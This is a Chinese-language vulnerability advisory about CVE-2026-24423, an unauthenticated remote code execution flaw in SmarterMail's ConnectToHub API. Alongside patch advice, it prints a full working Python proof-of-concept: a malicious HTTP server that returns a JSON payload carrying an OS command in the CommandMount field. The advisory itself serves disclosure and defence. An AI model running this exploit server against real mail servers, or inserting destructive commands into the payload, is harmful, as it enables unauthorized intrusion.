
SmarterMail 是一款由 SmarterTools 公司开发的、基于 Windows 平台的邮件服务器软件。它主要面向中小型企业、教育机构以及需要私有化部署的组织,提供了一套完整的邮件通信解决方案,常被视作 Microsoft Exchange 的轻量级替代品,其优势在于无需依赖 Active Directory。
近期,安全研究人员披露了该软件中的一个高危远程代码执行漏洞,编号为 CVE-2026-24423。该漏洞的根源在于,其内部一个名为 ConnectToHub 的 API 接口在处理请求时,未对访问者的身份进行验证。攻击者可以利用此缺陷,构造特定的网络请求,诱使 SmarterMail 服务器连接至攻击者控制的恶意 HTTP 服务器。随后,恶意服务器可向 SmarterMail 返回包含操作系统命令的响应,从而实现远程命令执行,这无疑给攻击者进行远程渗透测试和利用打开了大门。
鉴于 SmarterMail 在特定用户群体中的使用范围,建议所有相关用户立即进行自查。
漏洞等级
高危
漏洞影响版本
- SmarterMail 版本号低于 Build 9511 的所有发行版。
漏洞详情与概念验证(PoC)
目前,漏洞的概念验证代码(PoC)已在 GitHub 上公开:
https://github.com/aavamin/CVE-2026-24423
该 PoC 是一个 Python 脚本,模拟了一个恶意的 HTTP 服务器。当存在漏洞的 SmarterMail 服务器向其发送特定请求时,该服务器会返回一个精心构造的 JSON 响应,其中包含可在目标系统上执行的命令。
以下是 PoC 脚本的核心代码:
#!/usr/bin/env python3
from http.server import BaseHTTPRequestHandler, HTTPServer
import json
class Handler(BaseHTTPRequestHandler):
def _send_json(self, code: int, obj: dict):
data = json.dumps(obj).encode("utf-8")
self.send_response(code)
self.send_header("Content-Type", "application/json")
self.send_header("Content-Length", str(len(data)))
self.end_headers()
self.wfile.write(data)
def do_POST(self):
if self.path != "/web/api/node-management/setup-initial-connection":
self._send_json(404, {"error": "not found", "path": self.path})
return
length = int(self.headers.get("Content-Length", "0"))
body = self.rfile.read(length).decode("utf-8", errors="replace")
print(" Received POST:", self.path)
print(" Body:", body)
resp = {
"ClusterID": "f0e12780-f462-4b51-a7db-149f1d56209c",
"SharedSecret": "any-value",
"TargetHubs": {"a": "b"},
"IsStandby": False,
"SystemMount": {
"Enabled": True,
"ReadOnly": False,
"MountPath": "C:\\",
"CommandMount": "whoami > C:\\whoami.txt"
},
"SystemAdminUsernames": ["admin"]
}
self._send_json(200, resp)
def main():
host = "0.0.0.0"
port = 80
print(f"Serving on http://{host}:{port}")
HTTPServer((host, port), Handler).serve_forever()
if __name__ == "__main__":
main()
#Powered by ChatGPT

从代码中可以看到,关键攻击载荷位于 resp 字典的 SystemMount.CommandMount 字段中。示例中命令为 whoami > C:\\whoami.txt,攻击者可以将其替换为任何其他恶意命令。
修复建议
厂商已针对此漏洞发布了安全更新。最有效的防护措施是立即将 SmarterMail 升级到最新版本。
官方下载与更新地址:
https://www.smartertools.com/smartermail/downloads
请受影响的用户,特别是负责系统稳定性和安全运维的管理员,务必尽快安排升级工作。同时,在条件允许的情况下,应在升级前对现有系统进行备份,并在测试环境中验证补丁的兼容性。
对于关注最新安全动态的运维和开发团队,持续学习和信息共享至关重要。欢迎在 云栈社区 与其他技术人员交流此类漏洞的防护经验与最佳实践。